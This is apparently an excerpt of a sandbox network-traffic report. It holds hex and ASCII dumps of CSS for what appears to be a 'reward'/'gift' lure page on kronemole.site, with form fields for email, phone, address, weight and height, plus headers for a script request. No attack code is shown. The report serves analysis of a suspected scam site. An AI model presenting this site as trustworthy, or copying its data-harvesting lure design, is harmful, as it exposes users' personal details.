                                                                          2023-11-21 16:58:40 UTC338INData Raw: 64 69 6e 67 3a 20 31 30 70 78 3b 0a 7d 0a 0a 2e 73 70 72 6f 67 72 65 73 73 2d 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 39 30 36 65 33 34 3b 0a 09 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 09 68 65 69 67 68 74 3a 20 35 70 78 3b 0a 09 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 70 78 3b 0a 7d 0a 0a 2e 73 70 72 6f 67 72 65 73 73 20 7b 0a 09 77 69 64 74 68 3a 20 30 3b 0a 09 68 65 69 67 68 74 3a 20 69 6e 68 65 72 69 74 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 61 35 30 30 3b 0a 09 62 6f 72 64 65 72 2d 74 6f 70 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 20 35 70 78 3b 0a 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 20 35 70 78 3b 0a 09 74 72 61 6e 73 69 74 69
                                                                          Data Ascii: ding: 10px;}.sprogress-container {background: #906e34;overflow: hidden;height: 5px;border-radius: 5px;}.sprogress {width: 0;height: inherit;background: #ffa500;border-top-right-radius: 5px;border-bottom-right-radius: 5px;transiti
                                                                          2023-11-21 16:58:40 UTC339INData Raw: 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 32 30 70 78 3b 0a 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 65 6d 61 69 6c 2d 74 69 74 6c 65 20 7b 0a 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 32 30 70 78 3b 0a 7d 0a 0a 2e 65 6d 61 69 6c 2d 73 75 62 20 7b 0a 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 7d 0a 0a 23 65 6d 61 69 6c 2d 64 61 74 61 2c 20 23 70 68 6f 6e 65 2d 64 61 74 61 2c 20 23 7a 69 70 2d 64 61 74 61 2c 20 23 73 74 61 74 65 2d 64 61 74 61 2c 20 23 73 74 72 65 65 74 2d 64 61 74 61 2c 20 23 63 69 74 79 2d 64 61 74 61 2c 20 23 66 6e 61 6d 65 2d
                                                                          Data Ascii: splay: none;padding-top: 20px;text-align: center;}.email-title {padding-top: 20px;}.email-sub {padding-bottom: 20px;font-weight: bold;font-size: 18px;}#email-data, #phone-data, #zip-data, #state-data, #street-data, #city-data, #fname-
                                                                          2023-11-21 16:58:40 UTC340INData Raw: 3b 0a 09 63 6f 6c 6f 72 3a 20 23 65 32 37 33 31 32 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 35 65 34 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 30 70 78 3b 0a 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 66 66 66 66 66 66 3b 0a 09 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 70 78 3b 0a 7d 0a 0a 2e 73 74 61 74 65 20 7b 0a 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 35 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 7d 0a 0a 23 65 6d 61 69 6c 2d 64 61 74 61 3a 66
                                                                          Data Ascii: ;color: #e27312;padding: 10px;text-align: center;background: #fff5e4;font-size: 14px;margin-top: 10px;border: 1px solid #ffffff;border-radius: 5px;}.state {width: 100%;border: none;margin-left: -5px;color: #666;}#email-data:f
                                                                          2023-11-21 16:58:40 UTC342INData Raw: 61 64 69 75 73 3a 20 31 30 30 76 6d 61 78 3b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 38 70 78 3b 0a 09 62 6f 72 64 65 72 2d 74 6f 70 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 20 30 70 78 3b 0a 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 20 30 70 78 3b 0a 7d 0a 0a 2e 69 6e 70 75 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 69 6e 69 74 69 61 6c 3b 0a 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 66 6f 72 6d 62 61 64 20 7b 0a 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 66 66 61 31 61 31 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 0a 2e 69 6e 76 61 6c 69 64 20
                                                                          Data Ascii: adius: 100vmax;margin-left: -8px;border-top-left-radius: 0px;border-bottom-left-radius: 0px;}.input-container{ display: flex; align-items: initial; justify-content: center;}.formbad {border-color: #ffa1a1 !important;}.invalid
                                                                          2023-11-21 16:58:40 UTC343INData Raw: 0a 09 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 36 70 78 3b 0a 09 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 32 70 78 20 37 70 78 20 72 67 62 28 30 20 30 20 30 20 2f 20 36 30 25 29 3b 0a 09 7a 2d 69 6e 64 65 78 3a 20 32 3b 0a 09 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 35 64 65 67 29 3b 0a 7d 0a 0a 2e 67 69 66 74 2d 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 20 63 6f 76 65 72 3b 0a 09 61 6e 69 6d 61 74 69 6f 6e 3a 20 68 65 61 72 74 62 65 61 74 43 61 72 64 20 33 73 20 69 6e 66 69 6e 69 74 65 20 6c 69 6e 65 61 72 3b 0a 7d 0a 0a 2e 67 69 66 74 2d 63 6f 6e 74 61 69 6e 65 72 32 20 7b 0a 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 62 61
                                                                          Data Ascii: border-radius: 6px;border: none;box-shadow: 0px 2px 7px rgb(0 0 0 / 60%);z-index: 2;transform: rotate(5deg);}.gift-container {background-size: cover;animation: heartbeatCard 3s infinite linear;}.gift-container2 {box-shadow: none;ba
                                                                          2023-11-21 16:58:40 UTC344INData Raw: 67 3a 20 31 30 70 78 3b 0a 09 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 70 78 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 77 69 64 74 68 3a 20 38 39 25 3b 0a 09 6d 61 72 67 69 6e 3a 20 61 75 74 6f 3b 0a 09 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 09 63 6f 6c 6f 72 3a 20 23 38 38 38 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 35 2c 20 2e 37 29 3b 0a 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 30 70 78 3b 0a 7d 0a 0a 2e 64 69 73 63 6c 61 69 6d 65 72 5f 73 20 7b 0a 09 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 09 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 09 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0a 09 77 69 64 74 68 3a 20 34 35 25 3b 0a 09 63
                                                                          Data Ascii: g: 10px;border-radius: 5px;font-size: 14px;width: 89%;margin: auto;display: none;color: #888;background: rgba(255, 255, 2555, .7);margin-top: 10px;}.disclaimer_s {display: none;overflow: hidden;white-space: nowrap;width: 45%;c
                                                                          2023-11-21 16:58:40 UTC346INData Raw: 0a 0a 2e 69 6e 70 75 74 5f 6c 61 72 67 65 20 7b 0a 09 77 69 64 74 68 3a 20 37 30 25 3b 0a 7d 0a 0a 2e 69 6d 67 2d 76 61 6c 65 6e 74 69 6e 65 4c 2c 20 2e 69 6d 67 2d 76 61 6c 65 6e 74 69 6e 65 52 2c 20 2e 69 6d 67 2d 76 61 6c 65 6e 74 69 6e 65 4c 6d 2c 20 2e 69 6d 67 2d 76 61 6c 65 6e 74 69 6e 65 52 6d 2c 20 2e 69 6d 67 2d 45 61 73 74 65 72 4c 2c 20 2e 69 6d 67 2d 45 61 73 74 65 72 52 2c 20 2e 69 6d 67 2d 45 61 73 74 65 72 4c 6d 2c 20 2e 69 6d 67 2d 45 61 73 74 65 72 52 6d 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 20 63 6f 6e 74 61 69 6e 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b
                                                                          Data Ascii: .input_large {width: 70%;}.img-valentineL, .img-valentineR, .img-valentineLm, .img-valentineRm, .img-EasterL, .img-EasterR, .img-EasterLm, .img-EasterRm {background-size: contain;background-repeat: no-repeat;height: 100%;position: absolute;
                                                                          2023-11-21 16:58:40 UTC347INData Raw: 68 69 6c 64 28 33 29 2e 72 65 77 61 72 64 20 7b 0a 20 20 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 30 70 78 20 38 70 78 20 31 70 78 20 23 66 66 61 65 30 30 3b 0a 7d 0a 2e 72 65 77 61 72 64 2d 70 61 67 65 20 64 69 76 3a 6e 74 68 2d 63 68 69 6c 64 28 31 29 20 2e 74 6f 70 2c 20 2e 72 65 77 61 72 64 2d 70 61 67 65 20 64 69 76 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 20 2e 70 6f 70 75 6c 61 72 2c 20 2e 72 65 77 61 72 64 2d 70 61 67 65 20 64 69 76 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 20 2e 6e 65 77 5f 70 72 6f 64 75 63 74 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 7d 0a 2e 70 6f 70 75 6c 61 72 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 37 32 64 35 36 32 3b 0a 7d 0a 2e
                                                                          Data Ascii: hild(3).reward { box-shadow: 0px 0px 8px 1px #ffae00;}.reward-page div:nth-child(1) .top, .reward-page div:nth-child(2) .popular, .reward-page div:nth-child(3) .new_product { display: inline-block;}.popular { background-color: #72d562;}.
                                                                          2023-11-21 16:58:40 UTC348INData Raw: 20 20 20 20 62 6f 74 74 6f 6d 3a 20 30 3b 0a 20 20 20 20 72 69 67 68 74 3a 20 30 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 20 32 30 70 78 20 30 20 32 30 70 78 3b 0a 7d 0a 2e 64 65 73 63 72 69 70 74 69 6f 6e 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 31 30 30 3b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 3b 0a 7d 0a 2e 72 65 77 61 72 64 20 2e 64 65 73 63 72 69 70 74 69 6f 6e 20 70 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 39 61 39 39 39 39 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 31 30 30 3b 0a 20 20
                                                                          Data Ascii: bottom: 0; right: 0; text-align: center; padding: 20px 20px 0 20px;}.description { text-align: left; font-weight: 100; display: block; margin-top: 0;}.reward .description p { color: #9a9999; font-weight: 100;
                                                                          2023-11-21 16:58:40 UTC350INData Raw: 0a 0a 09 2e 69 6d 67 2d 76 61 6c 65 6e 74 69 6e 65 52 6d 2c 20 2e 69 6d 67 2d 76 61 6c 65 6e 74 69 6e 65 4c 6d 20 7b 0a 09 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 7d 0a 7d 0a 0a 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 39 30 30 70 78 29 20 7b 0a 09 2e 69 6e 74 2d 69 6d 61 67 65 20 7b 0a 09 09 72 69 67 68 74 3a 20 30 3b 0a 09 7d 0a 0a 09 2e 69 6d 67 2d 45 61 73 74 65 72 4c 2c 20 2e 69 6d 67 2d 45 61 73 74 65 72 52 20 7b 0a 09 09 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 09 7d 0a 0a 09 2e 69 6d 67 2d 45 61 73 74 65 72 4c 6d 2c 20 2e 69 6d 67 2d 45 61 73 74 65 72 52 6d 20 7b 0a 09 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 7d 0a 09 23 6d 6f 64 61 6c 5f 65 6d 61 69 6c
                                                                          Data Ascii: .img-valentineRm, .img-valentineLm {display: block;}}@media only screen and (max-width: 900px) {.int-image {right: 0;}.img-EasterL, .img-EasterR {display: none;}.img-EasterLm, .img-EasterRm {display: block;}#modal_email
                                                                          2023-11-21 16:58:40 UTC351INData Raw: 35 70 78 3b 0a 09 7d 0a 0a 09 2e 72 65 77 61 72 64 2d 73 6d 61 6c 6c 2d 63 69 72 63 6c 65 20 7b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 77 69 64 74 68 3a 20 39 30 70 78 3b 0a 09 09 68 65 69 67 68 74 3a 20 39 30 70 78 3b 0a 09 09 6c 65 66 74 3a 20 32 30 70 78 3b 0a 09 7d 0a 0a 09 2e 6d 6f 62 69 6c 65 2d 77 72 61 70 20 7b 0a 09 09 68 65 69 67 68 74 3a 20 31 36 30 70 78 3b 0a 09 7d 0a 0a 09 2e 74 61 62 2d 66 72 6f 6e 74 20 7b 0a 09 09 68 65 69 67 68 74 3a 20 35 30 70 78 3b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 0a 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 35 30 70 78 3b 0a 09 7d 0a 7d 0a 0a 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69
                                                                          Data Ascii: 5px;}.reward-small-circle {font-size: 12px !important;width: 90px;height: 90px;left: 20px;}.mobile-wrap {height: 160px;}.tab-front {height: 50px;font-size: 20px;line-height: 50px;}}@media only screen and (max-wi
                                                                          2023-11-21 16:58:40 UTC352INData Raw: 32 33 66 39 0d 0a 77 69 64 74 68 3a 20 63 61 6c 63 28 31 30 30 25 20 2d 20 33 30 70 78 29 3b 0a 09 7d 0a 09 68 65 61 64 65 72 20 7b 0a 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 3b 0a 09 7d 0a 09 2e 6d 65 73 73 61 67 65 20 7b 0a 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 32 3b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 7d 0a 09 2e 71 75 65 73 74 69 6f 6e 73 2d 63 6f 6e 74 61 69 6e 65 72 20 23 6f 72 69 67 61 68 6f 67 20 7b 0a 09 09 70 61 64 64 69 6e 67 2d 62 6c 6f 63 6b 3a 20 30 2e 35 72 65 6d 3b 0a 09 7d 0a 09 2e 71 75 65 73 74 69 6f 6e 73 2d 63 6f 6e 74 61 69 6e 65 72 20 3e 20 2e 72 6f 77 20 3e 20 2e 6d 65 73 73 61 67 65 20 3e 20 70 7b 0a 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 2e 35 72 65 6d 3b 0a 09 7d
                                                                          Data Ascii: 23f9width: calc(100% - 30px);}header {margin-bottom: 0;}.message {line-height: 1.2;font-size: 14px;}.questions-container #origahog {padding-block: 0.5rem;}.questions-container > .row > .message > p{margin-bottom: .5rem;}
                                                                          2023-11-21 16:58:40 UTC354INData Raw: 75 70 7b 0a 09 09 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 30 3b 0a 09 7d 0a 09 2e 78 5f 6d 61 72 6b 7b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 0a 09 09 74 6f 70 3a 20 2d 31 30 70 78 3b 0a 09 09 72 69 67 68 74 3a 20 2d 38 70 78 3b 0a 09 09 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 09 7d 0a 09 23 6d 6f 64 61 6c 5f 65 6d 61 69 6c 20 2e 62 74 6e 2d 6c 69 67 68 74 2c 20 23 6d 6f 64 61 6c 5f 65 6d 61 69 6c 5f 70 6f 70 75 70 20 2e 62 74 6e 2d 6c 69 67 68 74 7b 0a 09 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0a 09 7d 0a 09 23 6d 6f 64 61 6c 5f 65 6d 61 69 6c 20 2e 6d 6f 64 61 6c 2d 68 65 61 64 65 72 2c 20 23 6d 6f 64 61 6c 5f 65 6d 61 69 6c 5f 70 6f 70 75 70 20 2e 6d 6f 64 61 6c 2d 68 65 61
                                                                          Data Ascii: up{padding-right: 0;}.x_mark{font-size: 20px;top: -10px;right: -8px;padding: 0 10px;}#modal_email .btn-light, #modal_email_popup .btn-light{text-decoration: underline;}#modal_email .modal-header, #modal_email_popup .modal-hea
                                                                          2023-11-21 16:58:40 UTC355INData Raw: 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 62 6f 72 64 65 72 2d 6c 65 66 74 3a 20 6e 6f 6e 65 3b 0a 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 7d 0a 0a 09 2e 63 72 5f 6c 65 67 5f 6c 2c 20 2e 63 72 5f 6c 65 67 5f 72 20 7b 0a 09 09 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 09 7d 0a 0a 09 2e 63 72 5f 6c 65 67 5f 6d 6f 62 20 7b 0a 09 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 7d 0a 0a 09 2e 69 6d 67 2d 45 61 73 74 65 72 52 6d 20 7b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 20 32 30 25 3b 0a 09 7d 0a 0a 09 2e 69 6d 67 2d 45 61 73 74 65 72 4c 6d 20 7b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 73
                                                                          Data Ascii: play: block;border-left: none;margin-left: 0 !important;padding-left: 0 !important;}.cr_leg_l, .cr_leg_r {display: none;}.cr_leg_mob {display: block;}.img-EasterRm {background-size: 20%;}.img-EasterLm {background-s
                                                                          2023-11-21 16:58:40 UTC356INData Raw: 72 6f 77 20 7b 0a 09 09 6c 65 66 74 3a 20 34 35 25 3b 0a 09 7d 0a 0a 09 2e 77 69 6e 6c 69 6e 65 20 7b 0a 09 09 77 69 64 74 68 3a 20 31 30 30 25 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 7d 0a 0a 09 23 77 65 69 67 68 74 2d 64 61 74 61 20 7b 0a 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 7d 0a 0a 09 23 68 65 69 67 68 74 49 2d 64 61 74 61 2c 20 23 68 65 69 67 68 74 46 2d 64 61 74 61 20 7b 0a 09 09 77 69 64 74 68 3a 20 34 39 25 3b 0a 09 7d 0a 0a 09 2e 64 69 73 63 6c 61 69 6d 65 72 20 7b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 7d 0a 0a 09 23 73 74 61 74 65 2d 64 61 74 61 20 7b 0a 09 09 70 61 64 64 69 6e 67 3a 20 31 32 70 78 20 32 30 70 78 20 31 32 70 78 20 34 38 70 78 20 21 69 6d 70 6f 72
                                                                          Data Ascii: row {left: 45%;}.winline {width: 100% !important;}#weight-data {width: 100%;}#heightI-data, #heightF-data {width: 49%;}.disclaimer {font-size: 12px;width: 100%;}#state-data {padding: 12px 20px 12px 48px !impor
                                                                          2023-11-21 16:58:40 UTC358INData Raw: 72 65 77 61 72 64 2d 77 72 61 70 20 7b 0a 09 09 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 09 72 69 67 68 74 3a 20 31 30 30 3b 0a 09 09 74 6f 70 3a 20 33 30 30 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 7d 0a 0a 09 23 70 6f 6c 69 63 79 2d 63 6f 6e 74 65 6e 74 20 7b 0a 09 09 68 65 69 67 68 74 3a 20 36 30 30 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 7d 0a 0a 09 23 70 6f 6c 69 63 79 2d 77 72 61 70 20 7b 0a 09 09 77 69 64 74 68 3a 20 39 30 25 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 7d 0a 0a 09 2e 63 6f 6d 6d 65 6e 74 20 2e 64 65 73 63 20 7b 0a 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 7d 0a 0a 09 23 71 75 65 73 74 69 6f 6e
                                                                          Data Ascii: reward-wrap {position: absolute;right: 100;top: 300px !important;}#policy-content {height: 600px !important;font-size: 12px;}#policy-wrap {width: 90% !important;}.comment .desc {margin-left: 0 !important;}#question
                                                                          2023-11-21 16:58:40 UTC359INData Raw: 67 68 74 3a 20 36 30 3b 0a 09 09 74 6f 70 3a 20 31 37 30 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 7d 0a 0a 09 2e 6d 65 73 73 61 67 65 2d 66 6f 6f 74 65 72 20 7b 0a 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 30 3b 0a 09 7d 0a 0a 09 2e 63 6f 6d 6d 65 6e 74 2d 70 61 67 65 20 7b 0a 09 09 70 61 64 64 69 6e 67 3a 20 32 30 70 78 20 33 30 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 7d 0a 0a 09 2e 6c 6f 67 6f 2d 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 6d 61 78 2d 68 65 69 67 68 74 3a 20 35 30 70 78 3b 0a 09 7d 0a 0a 09 2e 72 65 77 61 72 64 2d 73 6d 61 6c 6c 2d 63 69 72 63 6c 65 20 7b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 09 7d 0a 7d 0a 0a 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69
                                                                          Data Ascii: ght: 60;top: 170px !important;}.message-footer {padding-top: 0;}.comment-page {padding: 20px 30px !important;}.logo-container {max-height: 50px;}.reward-small-circle {font-size: 16px;}}@media only screen and (max-wi
                                                                          2023-11-21 16:58:40 UTC360INData Raw: 74 73 74 20 7b 0a 09 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 09 7d 0a 0a 09 2e 73 69 74 65 2d 6c 6f 67 6f 20 7b 0a 09 09 77 69 64 74 68 3a 20 31 35 30 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 7d 0a 7d 0a 0a 0a 2f 2a 73 61 66 61 72 69 20 2a 2f 0a 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 63 6f 6c 6f 72 2d 69 6e 64 65 78 3a 30 29 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 30 29 20 7b 0a 09 2e 69 6d 61 67 65 2d 77 72 61 70 70 65 72 20 7b 0a 09 09 68 65 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 7d 0a 0a 09 23 73 74 61 74 65 2d 64 61 74 61 20 7b 0a 09 09 70 61 64 64 69 6e 67
                                                                          Data Ascii: tst {display: block;font-weight: bold;}.site-logo {width: 150px !important;}}/*safari */@media only screen and (min-color-index:0) and (-webkit-min-device-pixel-ratio:0) {.image-wrapper {height: auto;}#state-data {padding
                                                                          2023-11-21 16:58:40 UTC361INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          10192.168.2.449750104.21.62.2034435352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-11-21 16:58:40 UTC78OUTGET /inc/msg.v3.js?655ce1bf9202e HTTP/1.1
                                                                          Host: kronemole.site
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://kronemole.site/00751fdff8a0f3cf22b7cf59c24e5f09
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
                                                                          2023-11-21 16:58:40 UTC256INHTTP/1.1 200 OK
                                                                          Date: Tue, 21 Nov 2023 16:58:40 GMT
                                                                          Content-Type: application/javascript
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800
                                                                          expires: Tue, 28 Nov 2023 16:58:40 GMT
                                                                          last-modified: Tue, 11 Jul 2023 21:35:45 GMT
                                                                          vary: Accept-Encoding,User-Agent
                                                                          x-frame-options: SAMEORIGIN
                                                                          x-xss-protection: 1; mode=block
                                                                          x-content-type-options: nosniff
                                                                          CF-Cache-Status: MISS
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7R3nP4IJF0s4IvajYeLFW%2FQUe5L4B99iR%2B4P1pVYvblL%2BV7r1ZAU%2FHJYj%2BfzJ3hx3dDRUO4vyn4AVs%2FU4tbgi%2Fggak7Yx42%2FJB9lSQfWiZWSWXtPRfuP8FqY6SmnP8HqUw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 829a7a922fa68192-IAD
                                                                          alt-svc: h3=":443"; ma=86400
